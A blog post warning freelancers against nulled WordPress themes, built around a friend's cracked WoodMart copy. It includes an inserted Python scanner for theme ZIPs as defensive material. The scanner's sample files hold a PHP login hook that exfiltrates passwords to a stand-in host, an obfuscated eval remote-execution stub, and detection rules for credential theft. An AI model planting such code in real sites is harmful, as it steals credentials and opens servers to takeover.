Krishna kant singh

Posted on • Edited on • Originally published at afkkrishna.hashnode.dev

The 'Free' Premium Theme Trap: What That YouTube Download Actually Costs

So recently, my friend downloaded a WordPress theme called WoodMart. He got it from a YouTube channel that was giving the theme away for free through a Google Drive link in the video description, so he didn't think much of it. He was a beginner freelancer and wanted to build the client's website as cheaply as possible, because beginner freelancers usually get paid less for website projects.

WoodMart is a premium theme. It costs $59, and one license covers one website.

But what my friend did was download a ZIP of that theme from the YouTube channel and build an e-commerce website on top of it.

So, as a cybersecurity specialist, the first thing I want to say is this: beginner freelancers, read this carefully.

If you come across a premium theme as a cracked ("nulled") copy or as a ZIP from an unknown source, don't download it, and don't install it on anything. You have no way of knowing what was added to the code, and nulled themes are a well-known way of planting backdoors and credential stealers, while the one thing you can be certain of is that you will never get security updates. Such a theme can leak your client's data, secrets and API keys, and the chance of the site being hacked is high.

My friend had already built the whole website. The payment gateway and the shipping manager were set up and logged in, but the theme was cracked. It ran perfectly, yet to run the theme legitimately a valid license key is required, and that key comes only from the official WoodMart website.

Even without a license the theme worked, but it was leaking data and was not secure.

Let me say a few things about the WoodMart theme so you know what it is.

  1. It is a premium theme. A single license costs $59.

  2. A purchased license gives you updates, the theme's premium features, and support. If you run into a problem, you can get personal help from the developers.

  3. The official package has not been modified by a third party, so it is free of planted malware and keeps receiving security fixes. That is what keeps your website clean.

But my friend downloaded a ZIP of the premium WoodMart theme from a YouTube channel that was giving it away for free and installed it on the client's website.

Later, while I was doing a security review and helping write the website's policies, I asked him: "Where did you buy the theme? Where is the license key? Did you actually buy it?"

He said no and told me he got the theme from that YouTube channel.

From there I started scanning the folder, because it was suspicious: no YouTuber can legally give away a premium product for free.

So what I did to fix this was scan the files. I am a software developer; I build AI tools and websites, so I know a fair bit about how websites work. (Yes, I also have a BCA.)

I wrote a prompt and gave it to Claude Code together with the ZIP file. Claude Code went through the whole archive looking for vulnerabilities and security issues, so I could confirm whether the files were harmful or not.

Here is what I got after scanning the file with my prompt.

prompt link

After seeing the report I realized that the theme was indeed suspicious. Inside the PHP files there was code that captured credentials and custom code that could leak passwords. It could also be used to attack and scan the website, among other things. It was very risky for the client.

Code like this hands your passwords to attackers, who can then take control of the website: use the stolen credentials, watch what users and admins do, and compromise the whole system. A theme's functions.php is loaded on every request, including the login page, so a hook added there sees each username and password in plain text as it is submitted, and WordPress itself does not check theme files for tampering. It was very dangerous.
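The review above was done by handing the archive to Claude Code. What follows is an added example, not the author's prompt or any code from the post, of the same triage done offline in Python: it opens the theme ZIP in memory, checks every PHP file for the patterns a reviewer looks for first (login hooks, raw reads of the submitted password, outbound requests, obfuscation, remote includes, PHP placed under asset directories), and flags a file when a credential source is paired with a way to send it out. The rule list, weights, file names and the three sample PHP files are constructed for this example and are not taken from any real theme; the base64 string in the sample decodes to a URL on the non-routable example.invalid domain.

```python
"""Offline triage of a WordPress theme ZIP for planted credential-stealing code.
Added example, not the post author's Claude Code prompt; the rules are review
heuristics and the sample archive is constructed inline so it runs offline."""
import io
import re
import zipfile

# (rule name, pattern, weight). Indicators, not proof: legitimate code can use any
# one of these, so verdict() looks at combinations rather than single hits.
RULES = [
    ("login-hook", re.compile(
        r"add_action\s*\(\s*['\"](wp_login|wp_authenticate|login_form|wp_login_failed)['\"]"), 3),
    ("raw-credential-read", re.compile(
        r"\$_(POST|REQUEST)\s*\[\s*['\"](pwd|pass|password|log|user_login)['\"]\s*\]"), 3),
    ("outbound-request", re.compile(r"\b(wp_remote_(post|get|request)|curl_init|fsockopen)\s*\("), 2),
    ("obfuscation", re.compile(r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("), 2),
    ("config-or-db-secret", re.compile(r"wp-config\.php|\bDB_PASSWORD\b"), 2),
    ("remote-include", re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://"), 3),
]
# Static-asset directories; executable PHP placed there is a red flag on its own.
ASSET_DIRS = {"images", "img", "fonts", "css", "uploads"}


def scan_php_source(path, source):
    """Return the list of findings for one PHP file (empty if nothing matched)."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern, weight in RULES:
            if pattern.search(line):
                findings.append({"rule": name, "line": lineno, "weight": weight,
                                 "text": line.strip()[:120]})
    if ASSET_DIRS & set(path.lower().split("/")[:-1]):
        findings.append({"rule": "php-in-asset-dir", "line": 0, "weight": 2, "text": path})
    return findings


def scan_zip(zip_bytes):
    """Scan every PHP file in the archive; returns {path: findings} for files with hits."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith((".php", ".phtml")):
                continue
            source = zf.read(info).decode("utf-8", errors="replace")
            findings = scan_php_source(info.filename, source)
            if findings:
                report[info.filename] = findings
    return report


def verdict(report, threshold=4):
    """Score each file; a credential hook or read plus a way out is the strongest signal."""
    out = {}
    for path, findings in report.items():
        rules = {f["rule"] for f in findings}
        score = sum(f["weight"] for f in findings)
        exfil = bool(rules & {"login-hook", "raw-credential-read"}) and bool(
            rules & {"outbound-request", "obfuscation", "remote-include"})
        out[path] = {"score": score, "credential_exfil": exfil, "flag": exfil or score >= threshold}
    return out


# Constructed sample files (hypothetical, not taken from any real theme).
BENIGN_FUNCTIONS_PHP = """<?php
add_action('wp_enqueue_scripts', function () {
    wp_enqueue_style('theme-style', get_stylesheet_uri());
});
register_nav_menus(array('primary' => 'Primary Menu'));
"""
PLANTED_HELPER_PHP = """<?php
// Login stealer: hooks a successful login, reads the submitted password, posts it out.
add_action('wp_login', function ($user_login, $user) {
    $payload = array('u' => $user_login, 'p' => $_POST['pwd'], 'h' => home_url());
    $endpoint = base64_decode('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvY29sbGVjdA==');  // example.invalid
    wp_remote_post($endpoint, array('body' => $payload, 'blocking' => false));
}, 10, 2);
"""
PLANTED_DROPPER_PHP = """<?php
@eval(base64_decode($_REQUEST['c']));  // remote code execution stub under images/
"""


def build_sample_zip():
    """Build the constructed archive in memory: one clean file, two planted ones."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("sample-theme/style.css", "/* Theme Name: Sample */\n")
        zf.writestr("sample-theme/functions.php", BENIGN_FUNCTIONS_PHP)
        zf.writestr("sample-theme/inc/helper.php", PLANTED_HELPER_PHP)
        zf.writestr("sample-theme/images/loader.php", PLANTED_DROPPER_PHP)
    return buf.getvalue()


if __name__ == "__main__":
    import sys  # usage: python scan_theme_zip.py theme.zip  (no argument: scan the sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_zip()
    report = scan_zip(data)
    for path, v in verdict(report).items():
        print(f"{'FLAG' if v['flag'] else 'note'} {path}: score={v['score']} exfil={v['credential_exfil']}")
        for f in report[path]:
            print(f"    [{f['rule']}] line {f['line']}: {f['text']}")
```

On the built-in sample, functions.php produces no findings, inc/helper.php is flagged as credential exfiltration (login hook, raw password read, base64 and an outbound post in one file), and images/loader.php is flagged for obfuscated eval in a place where no PHP should exist. A hit is a reason to read the file, not a conviction: legitimate themes call wp_remote_get for update checks, and a stealer can avoid every token listed here, so an empty report is not a clean bill of health.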

So after that I told my friend: "Buy the theme directly and replace this version as soon as possible. It is very suspicious and goes against security best practice. You need the original theme so you can maintain the website and its policies properly."

So I want to say this to everyone: don't buy or download cracked versions.

Never use cracked versions for client projects or production websites. Some people use them for testing; I don't recommend that either, because they are just as dangerous and insecure there.

Even if you are only testing on your own VPS, I still suggest avoiding cracked software: the planted code runs with the same privileges and outbound network access as on any other server, so whatever keys and passwords you use on that box can leave it.

I have also shared the prompt I used with Claude Code to scan the ZIP file. I encourage you to use a similar approach on any ZIP you download so you get a report on whether it is safe. Treat that report as triage, not proof: a tool can miss a well-hidden backdoor, so a clean result is a reason to look more closely, and buying the theme from the vendor is the only way to be sure of what you are installing.

I also want to say this to all freelancers:

Building websites for clients is a great way to learn, earn and gain experience. But don't build them on cracked themes or suspicious ZIP files. When you build a website, you are responsible for its security and for protecting your client. Security is part of the job.

You should also do regular maintenance and security checks over time (keep WordPress, the theme and the plugins updated, and review what is installed) to make sure everything stays secure.

This experience taught me an important lesson, and I wanted to share it with all of you.

And yes, my English is not perfect, so please ignore any remaining mistakes. I hope you found this useful.
